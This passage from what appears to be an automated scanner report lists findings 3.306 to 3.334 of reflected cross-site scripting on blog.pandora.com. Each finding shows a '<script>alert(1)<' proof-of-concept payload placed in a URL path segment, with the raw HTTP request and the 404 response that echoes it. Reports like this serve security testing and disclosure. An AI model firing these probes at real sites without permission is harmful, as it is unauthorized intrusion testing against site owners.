The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload eb220<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archiveseb220<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:17 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archiveseb220<script>alert(1)< ...[SNIP]... |
3.306. http://blog.pandora.com/pandora/archives/2010/11/town-halls-this.html [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/11 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9fcff<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20109fcff<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:19 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 368 Connection: close Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20109fcff<script>alert(1)< ...[SNIP]... |
3.307. http://blog.pandora.com/pandora/archives/2010/11/town-halls-this.html [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/11 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b86f5<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/11b86f5<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:22 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/11b86f5<script>alert(1)< ...[SNIP]... |
3.308. http://blog.pandora.com/pandora/archives/2010/11/town-halls-this.html [REST URL parameter 5] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/11 |
Issue detail
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 27a11<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/11 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:25 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/11 ...[SNIP]... |
3.309. http://blog.pandora.com/pandora/archives/2010/12/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/12 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bdac6<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorabdac6<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:09 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorabdac6<script>alert(1)< ...[SNIP]... |
3.310. http://blog.pandora.com/pandora/archives/2010/12/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/12 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2a0b4<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives2a0b4<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:11 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives2a0b4<script>alert(1)< ...[SNIP]... |
3.311. http://blog.pandora.com/pandora/archives/2010/12/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/12 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload bb68a<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010bb68a<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:13 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010bb68a<script>alert(1)< ...[SNIP]... |
3.312. http://blog.pandora.com/pandora/archives/2010/12/ [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/12 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8e5b4<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/128e5b4<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:16 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/128e5b4<script>alert(1)< ...[SNIP]... |
3.313. http://blog.pandora.com/pandora/archives/2010/12/holiday-music.html [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/12 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bc67e<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorabc67e<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:09 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 367 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorabc67e<script>alert(1)< ...[SNIP]... |
3.314. http://blog.pandora.com/pandora/archives/2010/12/holiday-music.html [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/12 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9cc4e<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives9cc4e<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:11 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 366 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives9cc4e<script>alert(1)< ...[SNIP]... |
3.315. http://blog.pandora.com/pandora/archives/2010/12/holiday-music.html [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/12 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload bd53e<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010bd53e<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:13 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 367 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010bd53e<script>alert(1)< ...[SNIP]... |
3.316. http://blog.pandora.com/pandora/archives/2010/12/holiday-music.html [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/12 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 84903<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/1284903<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:16 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 367 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/1284903<script>alert(1)< ...[SNIP]... |
3.317. http://blog.pandora.com/pandora/archives/2010/12/holiday-music.html [REST URL parameter 5] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/12 |
Issue detail
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e86cc<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/12 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:19 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 367 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/12 ...[SNIP]... |
3.318. http://blog.pandora.com/pandora/archives/2010/12/themed-stations.html [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/12 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5d3cd<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora5d3cd<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:17 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora5d3cd<script>alert(1)< ...[SNIP]... |
3.319. http://blog.pandora.com/pandora/archives/2010/12/themed-stations.html [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/12 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 25283<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives25283<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:19 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives25283<script>alert(1)< ...[SNIP]... |
3.320. http://blog.pandora.com/pandora/archives/2010/12/themed-stations.html [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/12 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ac8ae<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010ac8ae<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:22 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010ac8ae<script>alert(1)< ...[SNIP]... |
3.321. http://blog.pandora.com/pandora/archives/2010/12/themed-stations.html [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/12 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6f003<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/126f003<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:25 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/126f003<script>alert(1)< ...[SNIP]... |
3.322. http://blog.pandora.com/pandora/archives/2010/12/themed-stations.html [REST URL parameter 5] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/12 |
Issue detail
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c1b2a<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/12 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:28 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/12 ...[SNIP]... |
3.323. http://blog.pandora.com/pandora/archives/arizona/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/arizona |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2ed28<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora2ed28<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:44 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora2ed28<script>alert(1)< ...[SNIP]... |
3.324. http://blog.pandora.com/pandora/archives/arizona/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/arizona |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 43add<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives43add<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:46 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives43add<script>alert(1)< ...[SNIP]... |
3.325. http://blog.pandora.com/pandora/archives/arizona/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/arizona |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f01a6<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/arizonaf01a6<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:49 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/arizonaf01a6<script>alert(1)< ...[SNIP]... |
3.326. http://blog.pandora.com/pandora/archives/california/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 70767<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora70767<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:58 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 352 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora70767<script>alert(1)< ...[SNIP]... |
3.327. http://blog.pandora.com/pandora/archives/california/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d529c<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesd529c<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:00 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 351 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesd529c<script>alert(1)< ...[SNIP]... |
3.328. http://blog.pandora.com/pandora/archives/california/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7d9cb<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:03 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 352 Connection: close Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives ...[SNIP]... |
3.329. http://blog.pandora.com/pandora/archives/colorado/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 31f0f<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora31f0f<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:46 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora31f0f<script>alert(1)< ...[SNIP]... |
3.330. http://blog.pandora.com/pandora/archives/colorado/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3b9f5<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives3b9f5<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:48 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives3b9f5<script>alert(1)< ...[SNIP]... |
3.331. http://blog.pandora.com/pandora/archives/colorado/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f5a5f<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:51 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives ...[SNIP]... |
3.332. http://blog.pandora.com/pandora/archives/florida/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/florida |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 84903<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora84903<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:55 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora84903<script>alert(1)< ...[SNIP]... |
3.333. http://blog.pandora.com/pandora/archives/florida/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/florida |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fc611<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesfc611<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:57 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesfc611<script>alert(1)< ...[SNIP]... |
3.334. http://blog.pandora.com/pandora/archives/florida/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/florida |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c2e2a<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
